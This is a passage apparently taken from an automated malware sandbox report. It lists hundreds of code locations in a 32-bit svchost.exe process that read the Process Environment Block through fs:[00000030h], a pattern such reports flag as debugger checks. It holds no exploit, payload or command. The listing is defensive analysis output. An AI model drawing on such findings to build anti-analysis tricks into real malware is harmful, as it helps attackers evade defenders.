                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629240 mov eax, dword ptr fs:[00000030h]7_2_03629240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629240 mov eax, dword ptr fs:[00000030h]7_2_03629240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366724D mov eax, dword ptr fs:[00000030h]7_2_0366724D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A250 mov eax, dword ptr fs:[00000030h]7_2_0362A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB256 mov eax, dword ptr fs:[00000030h]7_2_036EB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB256 mov eax, dword ptr fs:[00000030h]7_2_036EB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636259 mov eax, dword ptr fs:[00000030h]7_2_03636259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705227 mov eax, dword ptr fs:[00000030h]7_2_03705227
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362823B mov eax, dword ptr fs:[00000030h]7_2_0362823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03667208 mov eax, dword ptr fs:[00000030h]7_2_03667208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03667208 mov eax, dword ptr fs:[00000030h]7_2_03667208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037052E2 mov eax, dword ptr fs:[00000030h]7_2_037052E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF2F8 mov eax, dword ptr fs:[00000030h]7_2_036EF2F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036292FF mov eax, dword ptr fs:[00000030h]7_2_036292FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036392C5 mov eax, dword ptr fs:[00000030h]7_2_036392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036392C5 mov eax, dword ptr fs:[00000030h]7_2_036392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F2D0 mov eax, dword ptr fs:[00000030h]7_2_0365F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F2D0 mov eax, dword ptr fs:[00000030h]7_2_0365F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov ecx, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C72A0 mov eax, dword ptr fs:[00000030h]7_2_036C72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C72A0 mov eax, dword ptr fs:[00000030h]7_2_036C72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov eax, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov eax, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov ecx, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov ecx, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705283 mov eax, dword ptr fs:[00000030h]7_2_03705283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366329E mov eax, dword ptr fs:[00000030h]7_2_0366329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366329E mov eax, dword ptr fs:[00000030h]7_2_0366329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C9179 mov eax, dword ptr fs:[00000030h]7_2_036C9179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705152 mov eax, dword ptr fs:[00000030h]7_2_03705152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov ecx, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637152 mov eax, dword ptr fs:[00000030h]7_2_03637152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C156 mov eax, dword ptr fs:[00000030h]7_2_0362C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660124 mov eax, dword ptr fs:[00000030h]7_2_03660124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03631131 mov eax, dword ptr fs:[00000030h]7_2_03631131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03631131 mov eax, dword ptr fs:[00000030h]7_2_03631131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov ecx, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F0115 mov eax, dword ptr fs:[00000030h]7_2_036F0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036351ED mov eax, dword ptr fs:[00000030h]7_2_036351ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037061E5 mov eax, dword ptr fs:[00000030h]7_2_037061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036601F8 mov eax, dword ptr fs:[00000030h]7_2_036601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366D1D0 mov eax, dword ptr fs:[00000030h]7_2_0366D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]7_2_0366D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037051CB mov eax, dword ptr fs:[00000030h]7_2_037051CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364B1B0 mov eax, dword ptr fs:[00000030h]7_2_0364B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03670185 mov eax, dword ptr fs:[00000030h]7_2_03670185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03687190 mov eax, dword ptr fs:[00000030h]7_2_03687190
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705060 mov eax, dword ptr fs:[00000030h]7_2_03705060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov ecx, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365C073 mov eax, dword ptr fs:[00000030h]7_2_0365C073
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD070 mov ecx, dword ptr fs:[00000030h]7_2_036AD070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632050 mov eax, dword ptr fs:[00000030h]7_2_03632050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D705E mov ebx, dword ptr fs:[00000030h]7_2_036D705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D705E mov eax, dword ptr fs:[00000030h]7_2_036D705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B052 mov eax, dword ptr fs:[00000030h]7_2_0365B052
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A020 mov eax, dword ptr fs:[00000030h]7_2_0362A020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C020 mov eax, dword ptr fs:[00000030h]7_2_0362C020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036550E4 mov eax, dword ptr fs:[00000030h]7_2_036550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036550E4 mov ecx, dword ptr fs:[00000030h]7_2_036550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0362A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036380E9 mov eax, dword ptr fs:[00000030h]7_2_036380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C0F0 mov eax, dword ptr fs:[00000030h]7_2_0362C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036720F0 mov ecx, dword ptr fs:[00000030h]7_2_036720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
